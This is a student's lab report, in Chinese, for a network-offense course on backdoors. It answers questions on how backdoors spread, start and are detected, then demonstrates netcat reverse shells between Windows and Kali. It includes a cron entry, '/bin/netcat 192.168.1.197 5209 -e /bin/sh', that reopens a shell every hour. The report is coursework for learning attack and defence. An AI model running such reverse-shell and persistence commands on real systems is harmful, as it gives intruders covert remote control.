20145209刘一阳《网络对抗》Exp2 后门原理与实践

基础问题回答

1.例举你能想到的一个后门进入到你系统中的可能方式？ •在网上下载软件的时候，后门很有可能被捆绑在下载的软件当中；
•浏览网页的时候，点的一些小广告可能会被植入后门。

2.例举你知道的后门如何启动起来(win及linux)的方式？ •Windows下在控制面板的管理工具中可以设置任务计划启动，或者通过修改注册表来达到自启的目的；
•对后门程序进行伪装，例如重命名成某个游戏的开始程序之类的，诱骗用户点击启动；
•Linux下可以通过cron来启动。

3.Meterpreter有哪些给你映像深刻的功能？ •直接通过指令获取主机的摄像头有点6，有点像电影里的黑客；
•获取击键记录也能得到很多信息，比如登录什么网站的密码，或者说和某人的重要聊天记录之类的，都非常容易被人窃取到进行分析；
•导出密码文件功能简直是有点无解，这样一来你的电脑相当于是透明的；
•后门进程的迁移，这样即使有管理员去查看运行的进程也很难发现后门的存在；
•使用后渗透攻击模块POST可以对主机进行更深入的攻击。

4.如何发现自己有系统有没有被安装后门？ •没有经过免杀处理的后门程序可能很容易就被杀毒工具扫出来，不过一般现在这样的后门也很少了；
•检查防火墙开启的端口和它对应的进程，如果不是系统默认开启的端口都有嫌疑，找到对应的进程，对其进行抓包分析；
•下载专门的监控软件，对操作系统中的进程进行监控，看是否存在异常。

常用后门工具实践

Windows获得Linux Shell

1.在Windows下，先使用ipconfig指令查看本机IP：

2.使用ncat.exe程序监听本机的5209端口：

3.在Kali环境下，使用nc指令的-e选项反向连接Windows主机的5209端口：

4.Windows下成功获得了一个Kali的shell，运行ls指令如下：

Linux获得Windows Shell

1.过程与之前的类似，在Kali环境下用ifconfig查看IP：

2.使用nc指令监听5209端口：

3.在Windows下，使用ncat.exe程序的-e选项项反向连接Kali主机的5209端口：

4.Kali下可以看到Windows的命令提示，可以输入Windows命令：

使用nc传输数据

1.Windows下监听5209端口：

2.Kali下连接到Windows的5209端口：

3.建立连接之后，就可以传输数据了，这里传输的是字符串，相当于两台主机在聊天，也可以用重定向操作符来传输文件：

实验内容

使用netcat获取主机操作Shell，cron启动

1.先在Windows系统下，监听5209端口：

2.在Kali环境下，使用man crontab指令查看crontab命令的帮助文档，从文档中我们可以知道crontab指令可以用于设置周期性被执行的指令。该命令从标准输入设备读取指令，并将其存放于crontab文件中，以供之后读取和执行。

3.用crontab -e指令编辑一条定时任务，选择编辑器时选择基本的vim编辑器就行：

4.在最后一行添加55 * * * * /bin/netcat 192.168.1.197 5209 -e /bin/sh，意思是在每个小时的第37分钟反向连接Windows主机的5209端口，设置成55的原因是我当时的时间是，为了能立马看到效果，所以我将时间设置在了一分钟以后：

5.当时间到了时，此时已经获得了Kali的shell，可以输入指令（如果在这之前输入指令，屏幕上不会有显示，但是等到了55分时会立马显示出来）：

使用socat获取主机操作Shell, 任务计划启动

基础知识
1.socat是ncat的增强版，它使用的格式是socat [options]